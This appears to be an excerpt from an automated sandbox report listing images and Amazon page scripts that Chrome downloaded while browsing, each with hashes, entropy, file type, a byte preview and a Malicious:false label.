                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x500, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):26619
                                                                                                                                                                                                        Entropy (8bit):7.971253614769683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:mZFwuCwpjVrNtl7tpOIjPl2VhQQFaHoPU:KttjVRtl60s0xH
                                                                                                                                                                                                        MD5:B08CF8E389FDD494EA6C2EBE4D7A2131
                                                                                                                                                                                                        SHA1:7B31946447EF0FC3A52216BC8CDDB94B1559A4BF
                                                                                                                                                                                                        SHA-256:7E8108B191AFDFB28308AE4401375CAAAC5C811C27C11AC3505D535A654A1495
                                                                                                                                                                                                        SHA-512:1BAA0449D6321C52AD15FFC5BDCC64B2D418C729A6C827F7F04A2830A8581A33AD5C00553773FFE4A249451378A04AF8C0AC74407FFB53D70D383C37A3A06C13
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41RqroVv0XL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................d..:....!... .SN.w.\...J>F .p.=$.#\.;8...."X...d5..N..,.'#.MQ.c...s.7.7.....b.^oF..h....<...,2....y....@<..E.....j=..gsN...7o...,.t.1.l....Y.L..|x..{....2@....dz<.e..D............zh.........v)...Q.......:.l......B)DGFA.a...c.J.7GH.....>s.t..r.u .../G6E.Jn.L..."...5......`.$..4.....C.0.?........z.i..$..].............(q]ZUuz`.8.....o..Z........$p=....H.;...8y.[..s.y..|.. ..@...9..^E.[.Kn.L......^.r..x.........m.}..lj..?Ai.m/..5../....Lu.g7.%:.a.....4.....$t.._tz`.:.....k..Z.......8..F...&.&...L.....z.o......j...o..<Z..r+.....F....%N.5:.]Z./V..1......W.~....R=q4T...Y.............yz.\.....#....F.Eu..c..S.......0O.....6.P".>..+.....l.-`......7.y.+....Q.....r..1L...a.......:.E.7C....O.{.R..{.......b.9r....&.x^.(./
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):33268
                                                                                                                                                                                                        Entropy (8bit):7.74699063138377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:4YyvCAlYCdmwKNDe2/DaBDbdKzTCnbUVF9X7G5Vyc:4UC0wKR0BDbETCnIF3c
                                                                                                                                                                                                        MD5:44C5ACA9865E4D7DAD0F9AD4082EA612
                                                                                                                                                                                                        SHA1:14A6302B362BB33CCA565548E5F3017B090202CF
                                                                                                                                                                                                        SHA-256:7D182376483481C1C0EF3A2235B10CCF49DCF2C58B5AA51EA7BB8677916B72E0
                                                                                                                                                                                                        SHA-512:F16A8C815319CC9491C23C6D18CED92A2295A5F276E570EAD35B7A4AB991DE5016AB510BF291EF36951B09D2D820F5AE27AA9DB980E64175F87047B77A845710
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1509
                                                                                                                                                                                                        Entropy (8bit):7.48086165068852
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TRe+0CmRI2X2JNJYziQF6qfnUTqCzCck8iRJKjl01KggceqkAUZFkU6qW/Yn2Lo:TT0rDX2JEGQdPU2Czpwglo187kU6VBU
                                                                                                                                                                                                        MD5:21E9070ABCE4D3CDA94AD673B35D29B6
                                                                                                                                                                                                        SHA1:B0852709E7B64141DD7D01ADEB8877AF4FE571EF
                                                                                                                                                                                                        SHA-256:0410285A921104DF17C7A195BE9C3011FB62DBF45ADCB6F73B2E1395D997BF48
                                                                                                                                                                                                        SHA-512:0C78284A3AB42DEAEF9F916D91D6816A3259A481A3F6F761736A3525DD71F04BDE05A40D287097399AB02E33FDAEF72FBDB4F21BDE2CAB4F2F05C610EC654DE6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1A..."2Qaq....#3Rb....Bcs...............................................1............?..|....................../..5..Pm....VEw%(I4.1.8"RP.oEt..m...@,.4q.<j..X.m\._"Oz.../..,./Wr...k./4..h.4.3..z/XW....I)...^...;.X.JQ{O...........5.-.T./._.@9II...om6..m?...02.'.k.[....5.~.-q.{&./.ar.Q..i...b......[*.v.<l_.q..)B.P..%...$........s$W.th...<1...T.r.Z...z./..%..._.q...uz.....o..=/.e.)..C..M..6..xK.9e./..]{..+........Q.Q..g.g.w.....U....7N.4...Kg.a.)...?.NKJ.......Q.i..:>...M2...'....i..0.....Zi....4.....EG.....$[.$...9y.x...*/......M.{..D..}"5.Q..l6i..cdE.c%.SF.^(.Z$....5.$....V.....d....6..;!m..n-jn>..M.a.....'d3!.....K.6E.\..k......jSvE...eZ....,.}WG..........T...Y?......s./e...:.h^..K..g...:}:.U..)u........?(....9....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (607)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10158
                                                                                                                                                                                                        Entropy (8bit):5.1802871493858484
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:WiF4QtoZmosQwyi3aOxDxpL6shV/icawy8P+KexjLIvwEgveEHvuEfunuyUIK8AB:pto0oiPpL6shFiP8PX9I/PvV2yZ
                                                                                                                                                                                                        MD5:07A45F05EF21AE19E99F4B71039C95CD
                                                                                                                                                                                                        SHA1:D3B7399B84358638740DC746EE34FF8236B8E06C
                                                                                                                                                                                                        SHA-256:DD16175D6A1472CEA68FC92923A98B80C7CBD809877CDFDD1091200FE3118C84
                                                                                                                                                                                                        SHA-512:82FD00D8484B8365138B95D59413F916029B146059373013EFB5E9760FA5570D7F915A072D8F16563E6C81379DC0B7EA619D7C373CC4F77D1B8387D93282ED28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(g){var e=window.AmazonUIPageJS||window.P,w=e._namespace||e.attributeErrors,p=w?w("AmazonGatewayHerotatorJS",""):e;p.guardFatal?p.guardFatal(g)(p,window):p.execute(function(){g(p,window)})})(function(g,e,w){g.when("generic-observable").register("gw-herotator-controller",function(g){var f=function(){};return function(e){function y(){h.notifyObservers("delayBegin")}function z(){h.notifyObservers("delayInterrupted")}function w(b){for(var c=0;c<l.length;c++)if(l[c]===b)return c+1}function k(a){a=.a||{};return{delay_complete:a.delay_complete||f,js_ready:a.js_ready||f,fg_loaded:a.fg_loaded||f,mouse_move:a.mouse_move||f,mouse_leave:a.mouse_leave||f,delay_interrupted_timeout:a.delay_interrupted_timeout||f,rotation_complete:a.rotation_complete||f,goto_card:function(a){a!==n&&b.user_navigation(l[a-1])},user_navigation:a.user_navigation||function(a){b=new D(a)},user_interaction:a.user_interaction||function(){b.user_navigation(l[n-1])},stop_autorotation:a.stop_autorotation||function(){b.u
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17542
                                                                                                                                                                                                        Entropy (8bit):2.247918084411713
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                                                                                        MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                                                                                        SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                                                                                        SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                                                                                        SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/favicon.ico
                                                                                                                                                                                                        Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23
                                                                                                                                                                                                        Entropy (8bit):4.175735869100492
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:VXciJ:hD
                                                                                                                                                                                                        MD5:C7D3355DDAC8D35912F6CB56C4BE6ECA
                                                                                                                                                                                                        SHA1:4ECB85CA8A4B633FE7DB11B2B7591AF83A89D406
                                                                                                                                                                                                        SHA-256:88EA58255D4CD82340F7ACAABE0E6A99F195A4DC2CA6EF56EC503D03B331BEE5
                                                                                                                                                                                                        SHA-512:8164D943F11F6559A8AB31869676FD4801E6E8C18DF05B53EF2F5CE5EC23BD632E66018EC134DA658289B6FA4C2BA15EF47DCF6210866457CFA7DEDB45994272
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead-
                                                                                                                                                                                                        Preview:window.ue_adb_chk = 1;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):263241
                                                                                                                                                                                                        Entropy (8bit):5.402576149145902
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:6wJFp+KkP0R9NLRqZSHoFvKZOyxXqv9KPXobdP2JwV5hI8MV4+4BZ2fTzdh1CXtj:6wJFp+KkP+LRqZSHoFvKZhxXqv9KPXo9
                                                                                                                                                                                                        MD5:BCEEC262E334DD84CFAEF57B305CCD6E
                                                                                                                                                                                                        SHA1:3A914AAC06ED5A0C95B1BF0A138EEC95795C64EC
                                                                                                                                                                                                        SHA-256:5CC6D8DE96138950861AF49D02E785F0F98F35C06E9166F6387C939FC1D0F7C3
                                                                                                                                                                                                        SHA-512:C2C5D2C070EEB8BA6572FCE266CAA194D0E6A4D52DB1C719E50F160AEA80A704D21062F8D142A4816F34518A49D8980B91296E3C337FFBDB778070C9D114BFA0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (700)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11064
                                                                                                                                                                                                        Entropy (8bit):5.4433174798365735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZbvlbAoUi6Dg2E5WhZzhlldp9DYBzL1XunwBwHZJwV20z9jy+5gtPRmy3zWD1o56:ZLlzUib52VlD9MBzL1XunqU70ZeAgtJ0
                                                                                                                                                                                                        MD5:B521EB86FBCCEA3698ACAF8809DB4F87
                                                                                                                                                                                                        SHA1:57C9316B7A1E2C267A9887A952E4FEFEE23FAB8F
                                                                                                                                                                                                        SHA-256:BB0037C04F550C1C068C192142C71350788550CAED8637F7A102D53DAD85ACB6
                                                                                                                                                                                                        SHA-512:19B2F06358B763FBE2EA909D8FD1BD31C9E9EC01538F1995CBB60AE5266FBF894AC951445FF8876A6F642881D3CA691595CA9F0B6A7AA0FFEF885D3E89C4E8CA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:'use strict';mix_d("P13NSCCards__p13n-rvi:p13n-rvi__JiYG2f7T","exports tslib @p/A @c/metrics @c/aui-carousel @c/dom @c/remote-operations @c/scoped-dom @p/a-carousel-framework @c/logger @c/aui-untrusted-ajax @c/browser-operations".split(" "),function(B,u,G,y,H,I,J,K,L,M,N,O){function w(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}var n=w(G),P=w(H),Q=w(J),v=w(K),R=w(L),x=w(M),S=w(N),T=w(O),C={},z=function(a,d,b){void 0===d&&(d="");void 0===b&&(b=1);d=a+d;C.hasOwnProperty(d)||(C[d]=.!0,y.count(a,(y.count(a)||0)+b))},U=function(a){z(n["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var d=function(c,e){c={$event:{preventDefault:n["default"].$.noop,stopPropagation:n["default"].$.noop},$target:c.getContent().find('[data-a-tab-name="'+e+'"]'),data:{name:"energyEfficiencyTabSet"}};n["default"].trigger("a:declarative:a-tabs:click",c)},b=function(c,e){var h=c&&c.$event,f=c&&c.data||{},p=f.activeTabName,l=f.modalHeight,r=f
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 105x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3796
                                                                                                                                                                                                        Entropy (8bit):7.871287059574145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rV6RCGmanhphFkmDWCw76aqSQJ/DFqdSDqH+l++vrfUquNi+5N4b/ehF0413T:TSELDW5mjboKqH+l+QC74b/C04Fxp
                                                                                                                                                                                                        MD5:AE5A06AF1511BAED7A74658741143629
                                                                                                                                                                                                        SHA1:FEF2EBD103EBD25E42BAFB08566845F3F195895D
                                                                                                                                                                                                        SHA-256:EC6934ACC0B3A2FFA6B48319147E5A07183A634CBED435D4F0662086CD5044BC
                                                                                                                                                                                                        SHA-512:FDAA49870421192EB0C4224C9A20DBCDA45586F2B8EAB1C3EB76279DCE0F3C05F0DF02F11BA65062C5BEF276434737E7F814908D74E904454F4527EB9F47B44D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61nBo0wifmL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........i.."..............................................................!..1"5AQat...#2346Bu..Scqs.....Rbr............................................................?...)@.5-F.2....Co..#...c......Mg..R......kH>...dc..ei....X*.#!.h&..T.KE...3mY$WH..w3....b.8b..".".S..P.2vof.#......O...H...Q..m...bT.......".U8..eB..*...<W.....\.[L.%.J.<...DN.+..#j..N@/.e.*.\...".v7....K....%...........a.QY.-!....ds.Iw.uBN.{....0k&s2>.-.w.....#(.a%.c.d...3..@@<......I_...Y.9.*#v.w.......F.(.t...PKI.0K..9..$b....A8.....d.{.)..YK..E...G....T....".....}Li=@..jW.....>.G.J...e.F....]FCaj...x..U..@.....JR.JW.Qk...*He.w.bM.;F...T*.r.N.PU....o.0.....a..&..A.;8%pc'se7.....0Z..G$v..-.*...dR9T...j...ca.k.-2(.4.6.3.Q....v...e|.."OC..D....{u.a.....X..-.W...}...)..@...F.......l.=..Q$.....C._+8|g.....,.;[4X.2.I....n.}...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 111x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7513
                                                                                                                                                                                                        Entropy (8bit):7.946532685684176
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Pd2rKcTJrj/PhM4JEn1J+iPgXHCcUKVGa4yjXV6qd:AT11M4QJxWC+gC4qd
                                                                                                                                                                                                        MD5:98FACFE423344FF1AF2942DD5A62B6F7
                                                                                                                                                                                                        SHA1:31AB4796D82617FCE6EBFE3A7DEE4020FF6690CF
                                                                                                                                                                                                        SHA-256:EAA84878B53CAE8541B4DB901EE958401247E554F33FBC53FAFD1D6A1ABDFA3F
                                                                                                                                                                                                        SHA-512:0C7B5C0AF6389702E02184DE55FFCFCD3FFA85FEA1693EC11E7401DDF190F9FAEED0A17DC931426E5078EF74D701DBC32F5F69FB5C1291376942C8409256D94E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........o.."................................................................!1..A."Qa2Bqrs........#346RUbtu....$ST...c....5Cd...................................................1....!2Aq3BQR..r............?...;...P.5.Na.H......I.n..1$^%0..y...+..+3Y....2..{.....86$rl.*.5...sI...9..C....t.pW..9..`.,..C1L.z...j..(..J..:..z+.iJ.. ...k.].....*{.<....+nR.F...OkD....P..T.<.i..jb......e.n>.Gh9....!2RT.O.S..2..B2%.0fP.....E..L.L..yfp!.....M$.=C.?p^."K.........n..o...<o.?;...=?..`..-..Xb{A.?.+.....G.-B:.......5GA=t..4O4.8.4i\.z..|V..H.OQ..".c..n.....(c..7..).o2...D....7*.....>.(...U...2.I<K.J.qbt.e.u.euMf.......U..R..h..jv18....#..F...|YK(.F.tr..f.{..R..G......E..2.Z.Z.....a{.zm.8.[h.t.'.x.).,.....TR .e.-4......py.MA..r....(..{!u..k...B..r.....w.g......uC..?..8.K,.M...>U.P~"..<.5...;...4%D..h.....He.......in.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3718
                                                                                                                                                                                                        Entropy (8bit):7.688627378509351
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TGgtPDzAKOsZ1aYkI62zket4JpBOjuwFLPv0iE97ynBQr1FjWMwon:nbzn1aG62lSRwuwF4iENyniFion
                                                                                                                                                                                                        MD5:2432EBFE16068CE8B56632DB9174309B
                                                                                                                                                                                                        SHA1:593B1BD3574A7AA1CC2C6E8D56EEF25AAEF3DF52
                                                                                                                                                                                                        SHA-256:EFA0C13C821530BB771903C86D0454D49A38E0F0E1182733275983077F820AD1
                                                                                                                                                                                                        SHA-512:C584CD0BA66F9F74F8F551880808325F99A10E77688E6BA2DC5F88A907795EE298ADCD79DE459BFEEE151F1578272334977BA4F2312A15E51825AB69426BC6BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................X....................................!z.-.I............Cy4W&.h.c}....y.5=..&-....3.YZ..........H.sCr...Q.[.E.gR..K........]eN.*.V..5..C...h...|;.D;.._....QcF...e|.....x.....]K....n.a....v.......&.6..... %."...mU..`Pm#..S..>!......G.].M.z.x.../..`.j..dC..V.....t..Y...~#[...cE......n.=j.........X.).....#..&.%..+@..[.*]b$.c..9Y...o)....7.1...,.b.2.).W.....S.. .c.........-.....^q..]i9............`d.q..u.A...[0..|=.)X..x...:l.`#..""<{H`.D.......k.C.t..#.!.<..p....H..G....................................?...+..........................3.!01.. "2#p.@A............s.EU......q..:..W8...\.us..S....:.N.S....:.N.S......It.U.J2.....M..e6.m...6...JIOo.3!)...EO.^(.5|R..FFFFFFFFFFDr...I.F..{(c.]Ug,lk.Yn....Q.j......@......h.&..._.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 144x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6007
                                                                                                                                                                                                        Entropy (8bit):7.922214735805358
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T7bgdLLzYtYkm72LUi3SxV9jrl1U7Be2+KRituICRR5vxhhPCJDtQjwZ1:DgdLzeo2LU/9nlCbCuImR5rhsDiwD
                                                                                                                                                                                                        MD5:C060A4EC5B66565E7A25F58BCC7D57B8
                                                                                                                                                                                                        SHA1:7C7223EF827F8CA30700CBEA33DDBD04729D16AE
                                                                                                                                                                                                        SHA-256:A907835E2075DED24A1E92414CB88E266AFA1C44A88BB02F93EDF5A41C8B1AD8
                                                                                                                                                                                                        SHA-512:BD4CF7052A41CD8C086CDE4898437E898C4F6E2581D5D8EC63BC57651DFEA716C6742BAA55D083B37D6E201A753808631563264CD0087DF08D95E68409E7D7C5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61JiO74FgDL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!...1Aq"2Q.Ra...#....$3bcr.....BCS...................................................!1.2Aq.."Ba.............?..t.(.)J.JR.R.....}..Y..7W..{.H.0.i.d..)....x.a.E.Y.U..N...I....b].S.."..Z.WY#..%..A.;e.W$3...o.o..@.9.K.....".c......~<.....z..}6.....t+.@..I..I....#,.E....;!.g$|*.?u...6.....4.m..eQu..t.Q.7M.J...1n=...P..#.Z.F|.7.).`H.d..x?[i..S..O.;.~`.2.=T.$+.......JR.R....(.)J.JR.R..+..ui..o...>."....#<...S..d>..hg..P@...b@.&T..~T.f*X......n...L.,mcH.L..Kvw.F.Vs.".r*..2.U.....2B.L..x ...zX.[..s.k0^%......~xm..h...l.V8...[d.....Ydl.........j...j....MN1."...<.c..I`3_...j.....j..._........P.~\2.U.Y.k.O...]E..WG....+,.h..I...e.0.F>.m:..ZRY.5.......D.........+.....t.}:.b..d.........hA..,.Q..l...I.)JU.E)J.JR.R....(.5mR.".....o...d..N..?A
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 400 x 900, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16237
                                                                                                                                                                                                        Entropy (8bit):7.914373477606932
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:uZUkQ4lr5sLQMaphjMr2VqWT33ZoXgsICdjyt8bpBXG8OfQwZop96OJ+CTy5:ui4B0arXq8ygCdjTHWfQ8opRpy5
                                                                                                                                                                                                        MD5:52B8D386D2B1D407C71A4AE966B61ADD
                                                                                                                                                                                                        SHA1:B962650FFFC15637F0D9F57C332702459F084B7B
                                                                                                                                                                                                        SHA-256:D47C1E50DB91BB597B75EDC63362CD0C568E4F5F15A3F8BE1B6ADFF24E89E447
                                                                                                                                                                                                        SHA-512:C6B69AF93D0683324A86CBEE5575E42A293C8588267C49034D1CC9AB3635034897838F9D5EA665B694C90D72CFE2B3F462CAD907CC74749E9AF863A90D233998
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/McBZv0ZvnbehkIx.png
                                                                                                                                                                                                        Preview:.PNG........IHDR................Z....gAMA......a.....sRGB.........PLTE....j..j.....i....fJ.nU.....i.....j..j............._bg[ajD`e.k..j..i.. ..i....\..i."'+.j.......j....................i.&+1otzMT[.i..........NSZbgl.i.jpw..E.... ...HOW.....j....bde...KQY........OTS344^ch....j.........adh............2.....eefZ`f.j.......{..{..ejr..........s.........i...biq`fnOSY....................fff.....f...........w.!!!fff...bhp.u..u..Y.'..PUY.....488.u.588.H.........F..............c.../.....tz.............1.................J.!!!..c.l.......q.m..v;d..D..Vx..../8A......#*1/8@.....\333...`gofffPW`.....%......KR[]dl.u.dkr.....dT[dX_g............kqx................7>A.].......Y..<........+4>.j..................}..UUU......?GP.{.............uK....7.'..rx~..R../~.....y.s.....%....W.........t...Y.{{I...YY...........tRNS.A4............b.H..[eo6..'..Q.......Q....a.w...`....w.a.A.5...q/.{I...e..X.^.......p....q..~......R.w...6........Gc........|......Z......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (302)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):51790
                                                                                                                                                                                                        Entropy (8bit):3.891909252266966
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:OaasSEFfoaO2aVjdPmwWZMhkDkybX18R+XU98BbS+/4/4wE3:I9deZMyrXW/4wU
                                                                                                                                                                                                        MD5:B7633514E329575760F4EA12FDEE74AA
                                                                                                                                                                                                        SHA1:BA8ACF3F72D467502BE2C0F0A8E4265FA57D37C5
                                                                                                                                                                                                        SHA-256:5026BB7935C8CA0978219CD257568EB75F0890A6C0D7FB03F91B5737FE4EB4FD
                                                                                                                                                                                                        SHA-512:8EC2F46B5B8C74C03F1DEB9CE5B8BD801066816F5456400E87A768364AEAED0CBC0683DA1E1E20C917DF8F6FE031ED6FCD0326842B9B792DBD33CDA838ED1C06
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/**. * @author sumeet. */.(function(module) {. if (module.isRegistered). return;. /** Generic Utility **/. (function(WlpInjectable) {. // TODO - Replace it with underscore library later. var q = 0;. var utility = {. isFunction: function(fn) {. return typeof fn === 'function';. },. isObject: function(n) {. var t = typeof n;. return 'function' === t || 'object' === t && !!n;. },. defer: function(callback) {. setTimeout(callback, 0);. },. uniqueId: function(n) {. var t = ++q + '';. return n ? n + t : t;. },. isEmpty: function(str) {. return !str || (str === '');. },. startsWith: function(str, search, rawPos) {. if (!String.prototype.startsWith) {. var pos = rawPos > 0 ? rawPos|0 : 0;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
